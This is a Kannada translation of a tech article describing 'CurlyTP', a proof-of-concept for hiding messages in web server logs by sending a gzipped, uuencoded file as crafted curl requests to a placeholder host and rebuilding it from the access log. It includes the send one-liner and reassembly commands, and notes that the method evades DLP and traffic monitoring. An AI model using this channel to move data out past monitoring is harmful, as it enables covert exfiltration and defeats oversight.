ಸರ್ವರ್ ಲಾಗ್‌ಗಳ ಮೂಲಕ ರಹಸ್ಯ ಸಂದೇಶಗಳ ವಿನಿಮಯ

ವಿಕಿಪೀಡಿಯಾದ ವ್ಯಾಖ್ಯಾನದ ಪ್ರಕಾರ, ಡೆಡ್ ಡ್ರಾಪ್ ಒಂದು ಪಿತೂರಿ ಸಾಧನವಾಗಿದ್ದು ಅದು ರಹಸ್ಯ ಸ್ಥಳವನ್ನು ಬಳಸುವ ಜನರ ನಡುವೆ ಮಾಹಿತಿ ಅಥವಾ ಕೆಲವು ವಸ್ತುಗಳನ್ನು ವಿನಿಮಯ ಮಾಡಿಕೊಳ್ಳುತ್ತದೆ. ಜನರು ಎಂದಿಗೂ ಭೇಟಿಯಾಗುವುದಿಲ್ಲ ಎಂಬುದು ಕಲ್ಪನೆ - ಆದರೆ ಕಾರ್ಯಾಚರಣೆಯ ಸುರಕ್ಷತೆಯನ್ನು ಕಾಪಾಡಿಕೊಳ್ಳಲು ಅವರು ಇನ್ನೂ ಮಾಹಿತಿಯನ್ನು ವಿನಿಮಯ ಮಾಡಿಕೊಳ್ಳುತ್ತಾರೆ.

ಮರೆಮಾಚುವ ಸ್ಥಳವು ಗಮನವನ್ನು ಸೆಳೆಯಬಾರದು. ಆದ್ದರಿಂದ, ಆಫ್‌ಲೈನ್ ಜಗತ್ತಿನಲ್ಲಿ ಅವರು ಸಾಮಾನ್ಯವಾಗಿ ವಿವೇಚನಾಯುಕ್ತ ವಸ್ತುಗಳನ್ನು ಬಳಸುತ್ತಾರೆ: ಗೋಡೆಯಲ್ಲಿ ಸಡಿಲವಾದ ಇಟ್ಟಿಗೆ, ಗ್ರಂಥಾಲಯ ಪುಸ್ತಕ ಅಥವಾ ಮರದಲ್ಲಿ ಟೊಳ್ಳು.

ಅಂತರ್ಜಾಲದಲ್ಲಿ ಅನೇಕ ಗೂಢಲಿಪೀಕರಣ ಮತ್ತು ಅನಾಮಧೇಯತೆಯ ಪರಿಕರಗಳಿವೆ, ಆದರೆ ಈ ಪರಿಕರಗಳನ್ನು ಬಳಸುವ ಅಂಶವು ಗಮನವನ್ನು ಸೆಳೆಯುತ್ತದೆ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಅವುಗಳನ್ನು ಕಾರ್ಪೊರೇಟ್ ಅಥವಾ ಸರ್ಕಾರಿ ಮಟ್ಟದಲ್ಲಿ ನಿರ್ಬಂಧಿಸಬಹುದು. ಏನ್ ಮಾಡೋದು?

ಡೆವಲಪರ್ ರಿಯಾನ್ ಫ್ಲವರ್ಸ್ ಆಸಕ್ತಿದಾಯಕ ಆಯ್ಕೆಯನ್ನು ಪ್ರಸ್ತಾಪಿಸಿದರು - ಯಾವುದೇ ವೆಬ್ ಸರ್ವರ್ ಅನ್ನು ಮರೆಮಾಡುವ ಸ್ಥಳವಾಗಿ ಬಳಸಿ. ನೀವು ಅದರ ಬಗ್ಗೆ ಯೋಚಿಸಿದರೆ, ವೆಬ್ ಸರ್ವರ್ ಏನು ಮಾಡುತ್ತದೆ? ವಿನಂತಿಗಳನ್ನು ಸ್ವೀಕರಿಸುತ್ತದೆ, ಫೈಲ್‌ಗಳನ್ನು ನೀಡುತ್ತದೆ ಮತ್ತು ಲಾಗ್‌ಗಳನ್ನು ಬರೆಯುತ್ತದೆ. ಮತ್ತು ಇದು ಎಲ್ಲಾ ವಿನಂತಿಗಳನ್ನು ಲಾಗ್ ಮಾಡುತ್ತದೆ, ತಪ್ಪು ಕೂಡ!

ಯಾವುದೇ ವೆಬ್ ಸರ್ವರ್ ಲಾಗ್‌ನಲ್ಲಿ ಯಾವುದೇ ಸಂದೇಶವನ್ನು ಉಳಿಸಲು ನಿಮಗೆ ಅನುಮತಿಸುತ್ತದೆ ಎಂದು ಅದು ತಿರುಗುತ್ತದೆ. ಇದನ್ನು ಹೇಗೆ ಬಳಸುವುದು ಎಂದು ಹೂವುಗಳು ಯೋಚಿಸಿದವು.

ಅವರು ಈ ಆಯ್ಕೆಯನ್ನು ನೀಡುತ್ತಾರೆ:

  1. ಪಠ್ಯ ಫೈಲ್ (ರಹಸ್ಯ ಸಂದೇಶ) ತೆಗೆದುಕೊಳ್ಳಿ ಮತ್ತು ಹ್ಯಾಶ್ (md5sum) ಅನ್ನು ಲೆಕ್ಕಾಚಾರ ಮಾಡಿ.
  2. ನಾವು ಅದನ್ನು ಎನ್ಕೋಡ್ ಮಾಡುತ್ತೇವೆ (gzip+uuencode).
  3. ಸರ್ವರ್‌ಗೆ ಉದ್ದೇಶಪೂರ್ವಕವಾಗಿ ತಪ್ಪಾದ ವಿನಂತಿಯನ್ನು ಬಳಸಿಕೊಂಡು ನಾವು ಲಾಗ್‌ಗೆ ಬರೆಯುತ್ತೇವೆ.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

ಫೈಲ್ ಅನ್ನು ಓದಲು, ನೀವು ಈ ಕಾರ್ಯಾಚರಣೆಗಳನ್ನು ಹಿಮ್ಮುಖ ಕ್ರಮದಲ್ಲಿ ನಿರ್ವಹಿಸಬೇಕಾಗುತ್ತದೆ: ಫೈಲ್ ಅನ್ನು ಡಿಕೋಡ್ ಮಾಡಿ ಮತ್ತು ಅನ್ಜಿಪ್ ಮಾಡಿ, ಹ್ಯಾಶ್ ಅನ್ನು ಪರಿಶೀಲಿಸಿ (ಹ್ಯಾಶ್ ಅನ್ನು ತೆರೆದ ಚಾನಲ್ಗಳಲ್ಲಿ ಸುರಕ್ಷಿತವಾಗಿ ರವಾನಿಸಬಹುದು).

ಸ್ಥಳಗಳನ್ನು ಬದಲಾಯಿಸಲಾಗುತ್ತದೆ =+=ಆದ್ದರಿಂದ ವಿಳಾಸದಲ್ಲಿ ಯಾವುದೇ ಸ್ಥಳಗಳಿಲ್ಲ. ಲೇಖಕರು CurlyTP ಎಂದು ಕರೆಯುವ ಪ್ರೋಗ್ರಾಂ, ಇಮೇಲ್ ಲಗತ್ತುಗಳಂತಹ ಬೇಸ್ 64 ಎನ್‌ಕೋಡಿಂಗ್ ಅನ್ನು ಬಳಸುತ್ತದೆ. ವಿನಂತಿಯನ್ನು ಕೀವರ್ಡ್‌ನೊಂದಿಗೆ ಮಾಡಲಾಗಿದೆ ?transfer?ಆದ್ದರಿಂದ ಸ್ವೀಕರಿಸುವವರು ಅದನ್ನು ಲಾಗ್‌ಗಳಲ್ಲಿ ಸುಲಭವಾಗಿ ಹುಡುಕಬಹುದು.

ಈ ಸಂದರ್ಭದಲ್ಲಿ ಲಾಗ್‌ಗಳಲ್ಲಿ ನಾವು ಏನು ನೋಡುತ್ತೇವೆ?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

ಈಗಾಗಲೇ ಹೇಳಿದಂತೆ, ರಹಸ್ಯ ಸಂದೇಶವನ್ನು ಸ್ವೀಕರಿಸಲು ನೀವು ಹಿಮ್ಮುಖ ಕ್ರಮದಲ್ಲಿ ಕಾರ್ಯಾಚರಣೆಗಳನ್ನು ನಿರ್ವಹಿಸಬೇಕಾಗುತ್ತದೆ:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

ಪ್ರಕ್ರಿಯೆಯು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸಲು ಸುಲಭವಾಗಿದೆ. Md5sum ಹೊಂದಾಣಿಕೆಗಳು, ಮತ್ತು ಫೈಲ್‌ನ ವಿಷಯಗಳು ಎಲ್ಲವನ್ನೂ ಸರಿಯಾಗಿ ಡಿಕೋಡ್ ಮಾಡಲಾಗಿದೆ ಎಂದು ಖಚಿತಪಡಿಸುತ್ತದೆ.

ವಿಧಾನವು ತುಂಬಾ ಸರಳವಾಗಿದೆ. "ಈ ವ್ಯಾಯಾಮದ ಅಂಶವು ಮುಗ್ಧ ಸಣ್ಣ ವೆಬ್ ವಿನಂತಿಗಳ ಮೂಲಕ ಫೈಲ್‌ಗಳನ್ನು ವರ್ಗಾಯಿಸಬಹುದು ಎಂದು ಸಾಬೀತುಪಡಿಸುವುದು, ಮತ್ತು ಇದು ಸರಳ ಪಠ್ಯ ಲಾಗ್‌ಗಳೊಂದಿಗೆ ಯಾವುದೇ ವೆಬ್ ಸರ್ವರ್‌ನಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. ಮೂಲಭೂತವಾಗಿ, ಪ್ರತಿ ವೆಬ್ ಸರ್ವರ್ ಒಂದು ಅಡಗುತಾಣವಾಗಿದೆ!" ಹೂಗಳು ಬರೆಯುತ್ತಾರೆ.

ಸಹಜವಾಗಿ, ಸ್ವೀಕರಿಸುವವರು ಸರ್ವರ್ ಲಾಗ್‌ಗಳಿಗೆ ಪ್ರವೇಶವನ್ನು ಹೊಂದಿದ್ದರೆ ಮಾತ್ರ ವಿಧಾನವು ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ. ಆದರೆ ಅಂತಹ ಪ್ರವೇಶವನ್ನು ಒದಗಿಸಲಾಗಿದೆ, ಉದಾಹರಣೆಗೆ, ಅನೇಕ ಹೋಸ್ಟರ್ಗಳು.

ಅದನ್ನು ಹೇಗೆ ಬಳಸುವುದು?

ರಿಯಾನ್ ಫ್ಲವರ್ಸ್ ಅವರು ಮಾಹಿತಿ ಭದ್ರತಾ ತಜ್ಞರಲ್ಲ ಮತ್ತು ಕರ್ಲಿಟಿಪಿಗಾಗಿ ಸಂಭವನೀಯ ಬಳಕೆಗಳ ಪಟ್ಟಿಯನ್ನು ಕಂಪೈಲ್ ಮಾಡುವುದಿಲ್ಲ ಎಂದು ಹೇಳುತ್ತಾರೆ. ಅವನಿಗೆ, ನಾವು ಪ್ರತಿದಿನ ನೋಡುವ ಪರಿಚಿತ ಪರಿಕರಗಳನ್ನು ಅಸಾಂಪ್ರದಾಯಿಕ ರೀತಿಯಲ್ಲಿ ಬಳಸಬಹುದು ಎಂಬ ಪರಿಕಲ್ಪನೆಯ ಪುರಾವೆಯಾಗಿದೆ.

ವಾಸ್ತವವಾಗಿ, ಈ ವಿಧಾನವು ಇತರ ಸರ್ವರ್ "ಮರೆಮಾಚುವಿಕೆ" ಗಿಂತ ಹಲವಾರು ಪ್ರಯೋಜನಗಳನ್ನು ಹೊಂದಿದೆ ಡಿಜಿಟಲ್ ಡೆಡ್ ಡ್ರಾಪ್ ಅಥವಾ ಪೈರೇಟ್ಬಾಕ್ಸ್: ಇದು ಸರ್ವರ್ ಬದಿಯಲ್ಲಿ ವಿಶೇಷ ಕಾನ್ಫಿಗರೇಶನ್ ಅಥವಾ ಯಾವುದೇ ವಿಶೇಷ ಪ್ರೋಟೋಕಾಲ್‌ಗಳ ಅಗತ್ಯವಿರುವುದಿಲ್ಲ - ಮತ್ತು ಟ್ರಾಫಿಕ್ ಅನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುವವರಲ್ಲಿ ಅನುಮಾನವನ್ನು ಉಂಟುಮಾಡುವುದಿಲ್ಲ. ಸಂಕುಚಿತ ಪಠ್ಯ ಫೈಲ್‌ಗಳಿಗಾಗಿ URL ಗಳನ್ನು SORM ಅಥವಾ DLP ಸಿಸ್ಟಮ್ ಸ್ಕ್ಯಾನ್ ಮಾಡುವುದು ಅಸಂಭವವಾಗಿದೆ.

ಸೇವಾ ಫೈಲ್‌ಗಳ ಮೂಲಕ ಸಂದೇಶಗಳನ್ನು ರವಾನಿಸುವ ವಿಧಾನಗಳಲ್ಲಿ ಇದು ಒಂದು. ಕೆಲವು ಮುಂದುವರಿದ ಕಂಪನಿಗಳು ಹೇಗೆ ಇಡುತ್ತವೆ ಎಂಬುದನ್ನು ನೀವು ನೆನಪಿಸಿಕೊಳ್ಳಬಹುದು HTTP ಹೆಡರ್‌ಗಳಲ್ಲಿ ಡೆವಲಪರ್ ಉದ್ಯೋಗಗಳು ಅಥವಾ HTML ಪುಟಗಳ ಕೋಡ್‌ನಲ್ಲಿ.

ಸರ್ವರ್ ಲಾಗ್‌ಗಳ ಮೂಲಕ ರಹಸ್ಯ ಸಂದೇಶಗಳ ವಿನಿಮಯ

ಸಾಮಾನ್ಯ ವ್ಯಕ್ತಿಯು ಹೆಡರ್ ಅಥವಾ HTML ಕೋಡ್ ಅನ್ನು ನೋಡದ ಕಾರಣ ವೆಬ್ ಡೆವಲಪರ್‌ಗಳು ಮಾತ್ರ ಈ ಈಸ್ಟರ್ ಎಗ್ ಅನ್ನು ನೋಡುತ್ತಾರೆ ಎಂಬುದು ಕಲ್ಪನೆಯಾಗಿತ್ತು.

ಸರ್ವರ್ ಲಾಗ್‌ಗಳ ಮೂಲಕ ರಹಸ್ಯ ಸಂದೇಶಗಳ ವಿನಿಮಯ

ಮೂಲ: www.habr.com

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ